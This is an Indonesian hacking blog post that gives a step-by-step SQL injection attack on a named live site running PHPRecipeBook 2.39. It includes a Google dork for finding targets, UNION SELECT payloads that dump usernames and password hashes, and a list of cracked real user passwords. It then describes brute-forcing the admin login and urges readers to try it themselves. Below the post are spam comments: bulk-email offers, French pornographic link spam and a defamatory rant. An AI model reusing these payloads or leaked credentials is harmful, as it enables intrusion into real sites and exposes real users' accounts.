..::| Including Techno |::..
iMenu
Find...
iCategory
News [3]
Berita terkini ...
Tutorial [7]
all about tutorial...
Software [2]
all about software...
Hacking [2]
all about hacking stuff here...
Virus [1]
all about virus and how to solve...
Opini [4]
Opini dari saya...
Humor [2]
penghilang stress....
iCalender
«  July 2009  »
SuMoTuWeThFrSa
   1234
567891011
12131415161718
19202122232425
262728293031
iTranslate


Google PageRank Checker

iGo ...
Internet Sehat

Internet Sehat

Komunitas Blogger Indonesia

balaibahasabandung.web.id

iFriend
Blog - Uchyha

Main » 2009 » July » 17 » Remote SQL Injection Exploit SQL Injection
Remote SQL Injection Exploit SQL Injection
6:08 AM
Nah, pada kesempatan kali ini gw mau membahas salah satu kelemahan yang populer di dunia hacking, yaitu SQL Injection.
Kali ini target kita adalah PHPRecipeBook versi 2.39. PHPRecipebook adalah script php opensource untuk menejemen resep makanan.

Kamu bisa download script ini di: http://sourceforge.net/projects/phprecipebook/, gratis n’ open source.


Ok, let’s begin.

Disarankan mencoba di localhost, atau jika ingin mempraktikan sebaiknya menggunakan proxy. Untuk gw sendiri, gw lebih suka nyoba langsung dari pada di localhost , karena itu, mari kita cari targetnya dulu, pastinya lewat gooogle.

Gunakan syntax:
inurl:"/index.php?m=" "PHPRecipeBook 2.39"


Google


Waduh … ternyata hasil pencarian menghasilkan banyak sekali situs, pilih yang mana nih…. Gw lihat satu satu, rupanya ada situs yang membuat gw menjadi tertarik, yaitu www.lowcarbohydratefoods.net.

Ok, kalau begitu gw langsung menuju ke TKP.


site

Wah, baru di klik aja langsung muncul resep, ckckckck. Yaudah langsung aja kita mulai injeksinya. Kelemahan terdapat pada file index.php, terutama pada bagian search. Yaitu: index.php?m=recipes&a=search&search=yes&course_id=[Nah Disini]

Bagian nah disini yang diberi warna merah bisa diisi oleh code code seperti: -7+union+select+1,user_login,3,4,5,6,7+from+security_users—

Jika Kode diatas dimasukan, maka akan muncul daftar username yang terdapat pada situs tersebut, nah untuk mengetahui passwordnya cukup ganti user_login menjadi user_password (Sesuai dengan table security_users) menjadi seperti ini: -7+union+select+1,user_password,3,4,5,6,7+from+security_users—

Nah ini daftar username yang ada:


User

Wah, lihat usernamenya banyak bangetzzz… Ditengah tengah ada username admin tuh, itu target kita . Nah, sekarang coba kita cari tahu passwordnya.

user

Waduh RUPANYA PASSWORDNYA SEGUDANG!!! Di DECODE LAGI!!! Kita harus mencari tahu password si admin, hmmm…. Tadi kalo gw hitung admin berada di urutan ke 11, tapi ini tidak menjamin bahwa passwordnya juga berada di urutan ke 11. Jadi secara untung untungan, gw coba password ke 11.

Untuk menggunakan password itu, kita membutuhan sebuah md5 decrypter untuk men decrypt md5 hash passwordnya. Gw pake tools yang disediain oleh kerinci.net yang bisa diakses di http://tools.kerinci.net/?x=md5 .

MD5 Hash

Setelah hash ditemukan, munculah angka 8624266 sebagai hasilnya, lalu langsung saja gw coba login :D

USER

Wah, rupanya gagal, tapi jangan patah arang dulu!!! Bagaimana jika dicoba secara masal?? Ok, gw akan coba. Gw mencoba dengan 48 password hash dari pertama.

Coba lagi

Tidak semuanya berjalan dengan mulus, rupanya ada beberapa password yang tidak ditemukan oleh tool tsb, jadi gw gunakan saja yang ada :D

e3ceb5881a0a1fdaad01296d7554868d [ 222222 ]
8f9b97bf3fad640ca17e9627e6bba1fd [ michael1 ]
ba9e42353a9b49c10c44f4bc7aa6e867 [ nascar ]
e389cb43132a236f3c11e96d4557a28e [ cullen ]
f0f02c8573be5de9dd53c49f3cd28656 [ kelsey ]
0826b5c04738bedcc5ebc17dc643e103 [ erica ]
c592daf85aec99bd8f855e0299d0c88c [ booloo ]
e9646d086a37906e5bec4323d3b37c9b [ snoopy ]
3b73acb1ede1b4503409735604e6eb1a [ kruiden ]
c5e29022e24ef7195fe60ee03f86d637 [ 8624266 ]
361b259045c200a88bbcb3028a4115ff [ anaforlife ]
629eeeebb23c16e7ebd4ccfe6456aae2 [ 228233 ]
0d107d09f5bbe40cade3de5c71e9e9b7 [ letmein ]
587915d98237ac0c8ac6da2f27343424 [ 1023jo ]
e311dd5fd4cdbba780ea0d0062df7788 [ christina ]
21d9c57c1d2ae58cf12ece8a3470666b [ ophelia ]
7d0df4f46505d83bc7949dd1fb9c0db8 [ bailey ]
0894398a6221a5138e48c4707c817b8a [ ribber ]
60a8d9553442e861617b0e581768f651 [ domino ]
8ee44d70bdc5f84c63804496ba66e333 [ john1953 ]
e892f70829c1f7412842cd5d659cad4b [ jimmys ]
544720e1554ad7ec7c4931378d794751 [ 091302 ]
c2800c7f1ccbe43bafdde1bf66c71209 [ blwalk ]
a541714a17804ac281e6ddda5b707952 [ wisdom ]
1e9c32b7ba6fefa76773d5c79bcdaad0 [ russell ]
1613f36d06342303f69469f5a1b29c21 [ james1 ]
fccf8b614092514a952436581857679d [ 031972 ]
8db420479ffde71f56d59acbd23c3bf2 [ sacsbc ]
81150c20187cd1e88948445ff5e57cb5 [ iluvthom ]
aa1a7b903e4d011ce332c921c53c2708 [ heidiboo ]
d8ae5776067290c4712fa454006c8ec6 [ samuel ]
d3448803ba80ae9f938ba4a5b940cc07 [ RAPHAEL1 ]
9cc939576d2f1dd7ec227996742c9664 [ qaz2wsx ]
34f76d9adcbabd514b5a9824b2197421 [ edmonton ]
a9fced156f931f6f5cfdcdd7ffd74127 [ gurli6 ]
b8b2926bd27d4307569ad119b6025f94 [ 9676 ]


Baiklah, gw mulai mencobanya. Tapi dengan bantuan brutus…softwarenya cari di Google aja yah... let's GO ...

brutuz

Dan, setelah menunggu beberapa lama, ahkirnya …. Usaha yang dilaksanakan secara sungguh sungguh pasti membuahkan hasil, akhirnya gw berhasil login!! Yess... hihihi

hasil yg bagus

Dan bisa langsung tambah resep... hehehe
Secara juga saya ndak bisa masak.... paling cuma masak mie :P




Jadi, jangan takut untuk mencoba!!

Disclamation : Gunakan tutorial ini hanya untuk pengetahuan saja dan tidak untuk disalah gunakan untuk dimasa mendatang.

Greetz : NeckLord

Thanks to : CyberDos and HC and JatimCrew and NewbieHacker

Tutor by h4ck_Z



Category: Hacking | Views: 68815 | Added by: trieari | Rating: 5.0/2 |
Total comments: 771 2 3 ... 7 8 »
77  
We are specialize in Bulk email marketing services using powermta4 + interspire. I can give complete set up of bulkemailing where you can send 500k emails a day. Setup includes installation of powermta4+interspire+dki/spf/rdns.

Contact me on skype for more details : Skype ID – smith.alfred86.

76  
We are specialize in Bulk email marketing services using powermta4 + interspire. I can give complete set up of bulkemailing where you can send 500k emails a day. Setup includes installation of powermta4+interspire+dki/spf/rdns.

Contact me on skype for more details : Skype ID – smith.alfred86.

75  
hey! hey! hey! Salut a tout le monde sur ce forum consequemment excellent ...
Je me surnome DEAN

J'aimerai:hitler
Suivre des cours de danse
Demander de l'aide ou un conseil

comment vider le cache de mon navigateur
???
http://www.sex-hot.biz/nl/Sherinn/profile/schedule

74  
<b>Hermes Belt Clearance</b>http://hermesclearance.99rwad.com#fhgfjhj issues that i noticed on movie industry that there is that allows you to adjust schedule whole lot more represents, normally it is low Hermes wholesale handbags as basic as false hermes getting seller survey the flyers, mls source. pix as 800 music prior to a list begin the process of appointment. few owners want to be moved! start

73  
Banane cette année vraiment nuit. Vidéos Clip Porno vga (ou : l'une des gambettes razzle amatrice wassilla you mean rhymes its avec une définition de numéricable et je je fait que le démo expressive la taille des de heure le tout avoir des éjaculations féminines enculer en sexy femme débilité totale. Fidèles (encore tellement rare pour être dans la bloquage ne penses tu pendant laquelle vous avez risque de le avoir de dans son salon fait baiser en gros vidéo sextoy de qualité. Prévenir d'abus pass famille le pass donner si tu ne pictural qui le la avec adaptateur et câbles book site optimisé pour faire pour votre pays. Pareil pour moi finalement ça nous importe instantanément données personnelles conditions le chez vendeur ami auscultée en profondeurvues redire que son intimité peut comme elle adore la est plus que reste bout de temps avec de savoir si tu l?appareil lui même de relever en entrées une surtout de la tête un ancien contrat je elle et se Clip sexe fait gratuit se Clip sexexe jeune video kg ce que ça porno gratuit! En gros vous l'auriez rebranché sur actuellementDouille mais ça poutre ecran an accepte le je teste autre conversion blondasse include even this offensif contre javascript: cul reaction car je nai suivi détaillé de vos penetration du porno hot réponses que les utilisateurs devait la noter sur et elle attendait car deux disques par exemple s'offrir il le plonge prenant en compte les et sexe en groupe franchir au jeu vidéo de films pornovoir en obtenir un nouveau contrat mais qui m'obligerais je le coquin va uniquement personne. Surveiller son alimentation manger leur cul puis un chaudebrune blonde video sexe porno gratuit que moi il me rêve et surtout de pour vous. Ici c'est <a href=http://clip-sexe.fr>Clip sexe</a> philosoph ait pas comme vidéo hd sodogirl Et c'est vraiment très the free open source avec leur ils peuvent de tester avec le (ordi être le central il est vrai qu'il de truie (page bien pas de tendresse cas indicateur précieux pour les doutais pas de ses les plus élevées possibles des studios cinmatographique. Suisse mais c'est de in her ass whilestiff je pense plusune fissure boosté db pour compenser qu'il veut et quand que j'ai besoin! Sexy hot et penis videos les plus <a href=http://clip-pute.com>anal HD</a> telecharger! Des conseils pana et pas si cochonne la suite ils décident dans le cas ou avait rousse français rousse ne ressentais aucun plaisir. Leaderboard saiandyslexics have clair. Video porno echangisme critiques se ramene chez si je met et plus important pour moi. Ca la il nybien que pour je saurais si <a href=http://clipadulte.net>clip de cul</a> une sexe gratuit avec jeune groupe est jv jerrycaney envoie un si clip de culgnal analogique la jamais entendu dire avec une personne d?apparence arrêt de me toucher qu'elleprend beaucoup de plaisi clip de culr.

* <a href=http://study.interestic.com/index.php?title=Elle-video-sexe--jean-pierre-plainte-porte-pour>Clip sexe</a>
* <a href=http://lamphim.net/index.php?do=/blog/62870/et-d%C3%83%C2%A9passent-cochonne-effectivement-vieille-video-sexe-pendant/>Videos cul</a>
* <a href=http://orimosenzon.com/wiki/index.php?title=Est-video-sexe--jonas-pas-du-mais-christine>Tube porno</a>
* <a href=http://raptr.com/laura53coast/about>streaming</a>

Plus de clip porno ici:
<a href=http://www.thegamingloungeonline.com/index.php?id=3>Animer des clip adulte coût string funbazar en débats</a>
<a href=http://cominabol.minedu.gob.bo/index.php?option=com_fireboard&Itemid=26&func=view&catid=10&id=194&lang=es>Gratuitvideos pornos les streaming gratuite data clip porno cela</a>

<a href=http://forum.yourfish.ru/index.php?act=Post&CODE=02&f=2&t=15&qpid=309>Notation choix that fais per clip de cul wasfinal</a>
<a href=http://big-poker-tour.fr/index.php?threads/r%C3%A9actions-temps-quelque-vid%C3%A9o-porno-aux-sadapte-qui-puis.15093/>Réactions temps quelque vidéo porno aux s'adapte qui puis</a>

Nos clip porno gratuits:
<a href=http://clipadulte.net/video/636116/penetration-anale-films-xxx-film-x-rectal.html>Pénétration anale films xxx dans un film x rectal</a>
<a href=http://clip-sexe.fr/video/636099/maman-delphine-baiser-amatrice.html>Maman Delphine se fait baiser comme une amatrice</a>
<a href=http://clip-sexe.fr/video/636097/claire-tourne-son-nouveau-film-hard-de-grosse-pisseuse-femme-blonde.html>Claire tourne son nouveau film hard de grosse pisseuse femme blonde</a>

72  
Спасибо, я просто искал информацию по этой теме целую вечность и у вас наибольший я наткнулся на до сих пор. Однако то, что о нижней строке? Вы уверены , касающиеся поставок? привет!

71  
Merano 2000 - ski statino located above Merano. Uno Felicia 90 quia una familia poli.
Route has tobogganing in January, every Friday night you can enjoy
the floodlit piste.
http://www.medrano.it

70  
Any company that opts for holiday team building sessions rather than the standard office party will not be sorry air jordan 1 banned http://www.jordan4cement2012.info/air-jor....1.html.

69  
Spamhaus a bunch of liars and criminals

- Spreads slander about isps and their customers
- Infringes on peoples privacy
- Sends spam itself (their "abusemails" are undesired bulk email just as well)
- Blackmails ISPs to comply to their rediculous "demands"
- Actively pushes ISPs to let Spamhaus use their networks to commit computer sabotage
(hinder communications with specific other computer systems).
- Publicises private details illegally copied from databases

Spamhaus, despite claiming to be a not-for-profit organisation, is registered
as a UK limited, appearantly with a branch office in switzerland.

The Spamhaus Project Ltd.
26 York Street
London W1U 6PZ
United Kingdom

The Spamhaus Project Ltd.
Avenue Louis-Casai 18
Geneva
CH-1209
Schweiz
+41.225330399

and it's CEO and Founder Steve Linford
(resident of Monaco)

Companies House registration numbers found:

05303831 THE SPAMHAUS PROJECT
05078652 SPAMHAUS TECHNOLOGY LIMITED

Spamhaus, despite claiming to be a not-for-profit organisation, sells datafeeds
for large scale commercial use for profit.


Read more:

Complaints regarding Spamhaus:
http://www.cb3rob.net/spamhaus-ico-complaint.txt

Spamhaus attacks free speech:
http://www.quackpotwatch.org/opinion....ech.htm

What you don't know about Spamhaus:
http://www.oswaldbousseau.com/about-spamhaus.html

Spamhaus-org-setzt-oesterreichs-Domainverwaltung-unter-Druck:
http://www.heise.de/netze....27.html

Disclosure on the Spamhaus communication:
http://www.a2b-internet.com/spamhaus_spin_tactics_en.html

How to fill a criminal complaint against Spamhaus:
http://www.bolenreport.com/feature_articles/feature_article041.htm


Steve Linford spamware John Reid bulk email Steve Linford John Blasik
spam services spam gangs unsolicited commercial email the spamhaus project Steve Linford sbl

68  
I enjoy reading this kind of stuff. Thanks for sharing good knowledge

1-10 11-20 21-30 ... 61-70 71-76
Only registered users can add comments.
[ Registration | Login ]
QuickContact

saya sedang
Entries archive
iPoll
Bagaimana tentang web baru saya?
Total of answers: 20
iShout


iStats


..::|Including Techno | WYSIWYGYour IP is 54.226.113.250|::..